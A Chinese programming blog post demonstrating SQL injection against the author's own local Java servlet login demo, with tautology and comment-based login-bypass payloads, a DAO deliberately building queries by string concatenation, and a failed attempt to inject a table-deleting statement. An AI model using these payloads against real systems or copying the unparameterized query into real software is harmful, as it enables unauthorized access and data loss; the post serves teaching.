SQL注入演示

已于 2022-03-19 14:00:32 修改
阅读量1.3k 收藏
点赞数
于 2022-03-19 11:51:23 首次发布
aaa
本文链接:https://blog.csdn.net/djydjy3333/article/details/123591704
版权

java

2种SQL注入演示,不知道密码也可以登录

-- 正常登录
select * from login1 where username ='zhangsan'and password = '123'
-- 用户名任意,密码输入: ' or '1'='1
select * FROM login1 where username = 'xyz' and password = '' or '1'='1'
-- 用户名zhangsan已知的情况下,用户名输入: zhangsan' -- (zhangsan' 空格--空格) 密码输入: 任意
select * from login1 where username ='zhangsan' -- ' and password = 'xxx'

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
登陆成功
在这里插入图片描述

或者
在这里插入图片描述
在这里插入图片描述
登陆成功
在这里插入图片描述
只修改dao层实现就可以,try代码有问题的话会不执行,直接catch了,数据库url错误之类的。

IUserDao2.java

package com.heima.dao;

import com.heima.pojo.Client;

import java.util.List;

public interface IUserDao2 {
    List<Client> findClient(String userName, String password);
}

UserDaoImpl2.java

package com.heima.dao.impl;

import com.heima.dao.IUserDao2;
import com.heima.pojo.Client;

import java.sql.*;
import java.util.ArrayList;
import java.util.List;

public class UserDaoImpl2 implements IUserDao2 {
    @Override
    public List<Client> findClient(String userName, String password1) {
        //用占位符防止sql注入的写法
        // String sql = "select * from login1 where userName = ? and password = ?";
        // List<Client> clientList = jdbcTemplate.query(sql, new BeanPropertyRowMapper<>(Client.class), userName, password);
        // return clientList;
        List<Client> clientList = new ArrayList<>();
        //错误写法,add()的空指针异常,无法添加list,直接catch了
        //List<Client> clientList = null;
        Connection con = null;
        Statement st = null;
        ResultSet rs = null;
        try {
            Class.forName("com.mysql.jdbc.Driver");
            con = DriverManager.getConnection("jdbc:mysql://localhost:3306/user_manager","root","root");
            st = con.createStatement();
            String sql = "select * from login1 where username ='" + userName + "'and password = '" + password1 + "'";
            System.out.println("sql = " + sql);
            rs = st.executeQuery(sql);
            while (rs.next()) {
                String username = rs.getString("username");
                String password = rs.getString("password");
                Client client = new Client();
                client.setUserName(username);
                client.setPassword(password);
                clientList.add(client);
                System.out.println("client = " + client);
            }

        } catch (Exception e) {
            e.printStackTrace();
        } finally {
            try {
                if (rs != null) {
                    rs.close();
                }
            } catch (SQLException e) {
                e.printStackTrace();
            }
            try {
                if (st != null) {
                    st.close();
                }
            } catch (SQLException e) {
                e.printStackTrace();
            }
            try {
                if (con != null) {
                    con.close();
                }
            } catch (SQLException e) {
                e.printStackTrace();
            }
        }
        return clientList;
    }
}

在这里插入图片描述
Client.java

package com.heima.pojo;

public class Client {
    private int id;
    private String userName;
    private String password;


    public int getId() {
        return id;
    }

    public void setId(int id) {
        this.id = id;
    }

    public String getUserName() {
        return userName;
    }

    public void setUserName(String userName) {
        this.userName = userName;
    }

    public String getPassword() {
        return password;
    }

    public void setPassword(String password) {
        this.password = password;
    }
}

LoginServlet.java

package com.heima.web;

import com.heima.pojo.Client;
import com.heima.service.IUserService;
import com.heima.service.impl.UserServiceImpl;

import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.util.List;

@WebServlet(urlPatterns = "/loginServlet")
public class LoginServlet extends HttpServlet {
    @Override
    protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
        doPost(request, response);
    }

    @Override
    protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
        //0.处理post请求数据乱码
        request.setCharacterEncoding("UTF-8");
        String userName = request.getParameter("userName");
        String password = request.getParameter("password");
        IUserService userService = new UserServiceImpl();
        List<Client> clientList = userService.findClient(userName, password);
        //3.给浏览器生成响应信息
        //如果能查到数据
        if (clientList!=null&&clientList.size()>0){
            //跳转到success.html
            request.getRequestDispatcher("/success.jsp").forward(request,response);
        }else{
            //没有查到数据    跳转到error.jsp
            request.getRequestDispatcher("/error.jsp").forward(request,response);
        }
    }
}

login.html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>登录页面</title>

    <link href="css/bootstrap.min.css" rel="stylesheet">
    <link href="css/login.css" rel="stylesheet">
    <script src="js/jquery.js"></script>
    <script src="js/bootstrap.js"></script>
</head>
<body>

    <div class="container text-center">
        <form class="form-signin" action="http://localhost:8080/loginServlet">
            <h2 class="form-signin-heading">登录页面</h2>
            <input type="text"  name="userName" class="form-control" placeholder="用户名" required autofocus>
            <input type="password"  name="password" class="form-control" placeholder="密码" required>
            <button class="btn btn-lg btn-primary btn-block" type="submit">登录</button>
        </form>
    </div>

</body>
</html>

注入删表命令,没成功,有语法错误

select * from login1 where username = 'x' and password = 'y';delete from login1 where '1'='1'

在这里插入图片描述

rs = st.executeQuery(sql);
可能是java执行sql时候语句出错
在navicat中是可以执行的

zhangsan3333
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入演示
qiuwen111的博客
06-13 262
打靶
sql-injection-demo:这是使用Java EE和Oracle数据库进行SQL注入演示
05-04
sql-injection-demo 这是一个使用Java EE和Oracle数据库进行SQL注入演示。 如果要重新创建数据库,则/database/emp.csv中有数据
sql注入一般流程(附例题)
热门推荐
Battery的博客
08-03 12万+
在与服务器数据库进行数据交互的地方拼接了恶意的sql代码,达到欺骗服务器执行恶意代码的目的。本质上是程序把用户输入的数据当成了sql语句执行。
SQL注入(sqli-labs靶场less-1演示
weixin_57448301的博客
04-22 300
SQLI-LABS LESS-1 get显错注入、get盲注、报错注入步骤详解
SQL注入详解
行者AI
09-16 1万+
现在大多数系统都使用B/S架构,出于安全考虑需要过滤从页面传递过来的字符。通常,用户可以通过以下接口调用数据库的内容:URL地址栏、登陆界面、留言板、搜索框等。这往往会出现安全隐患,为了更好的保护数据泄露或服务器安全,为了方便的安全测试,便编写此文。 1. SQL注入简介 SQL注入就是指Web应用程序对用户输入数据的合理性没有进行判断,前端传入后端的参数是攻击者可控制的,并且根据参数带入数据库查询,攻击者可以通过构造不同的SQL语句来对数据库进行任意查询。下面以PHP语句为例作为展示: query="SE
sql注入演示1111
最新发布
06-29
sql注入演示
SQL注入漏洞演示源代码
07-15
在这个"SQL注入漏洞演示源代码"中,我们可以深入理解这种攻击方式的工作原理,并学习如何防止它。 SQL注入是通过在输入字段中插入恶意的SQL语句来利用不安全的Web应用程序的漏洞。当应用程序将用户输入的数据直接...
asp源码-sql注入演示源码.zip
01-03
ASP源码与SQL注入演示源码是一套用于教学和安全测试的代码库,它展示了如何在ASP(Active Server Pages)环境中构建应用,并且包含了常见的安全漏洞,如SQL注入和XSS(跨站脚本攻击)。这个压缩包是针对那些希望学习...
关于sql注入的简要演示(入坑抛砖)
09-09
本文将通过一个简单的示例来解释SQL注入的工作原理和演示如何利用它。 首先,我们需要理解SQL的基本概念。SQL,全称Structured Query Language,即结构化查询语言,是用于管理和操作关系型数据库的标准语言。当我们...
防止sql注入demo
07-12
java版防止sql注入的filter 如果好用,别忘记了来评论一下,受益于更多的人
sql注入演示.exe
11-26
sql注入演示.exe
【JDBC】SQL注入攻击演示与解决方法
Java Island
09-27 929
SQL注入攻击与解决方案 Statement PreparedStatement
JDBC连接如何防止SQL注入
lucyLee的博客
10-07 4926
1. 绪言 想要学习mybatis的相关知识,学习之前复习了下JDBC的相关知识 发现自己竟然连如何实现JDBC连接都不知道了,真的是少壮用CV(粘贴复制),老大徒伤悲???? 总结一下,JDBC连接分为三步: 加载JDBC驱动 创建数据库连接 操作数据库实现增删改查:获取statement,执行SQL语句,处理执行结果 简单的连接和查询示例如下: import java.sql.*; public class Test { private static final String DR
SQL注入原理及攻击演示
weixin_38167826的博客
02-27 1933
一、什么是sql注入呢? 所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击.当应用程序使用输入内容来构造动态sql语句以访问数据库时,会发生sql注入攻击。如果代码使用存储...
SQL注入漏洞详解与实战教程
本资源是一份关于Web渗透测试入门的教程,重点讲解了SQL注入漏洞的相关知识。SQL注入漏洞是Web安全领域的一个严重威胁,它发生在黑客通过恶意构造SQL语句,利用应用程序处理用户输入时的不当过滤或转义,获取、修改...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值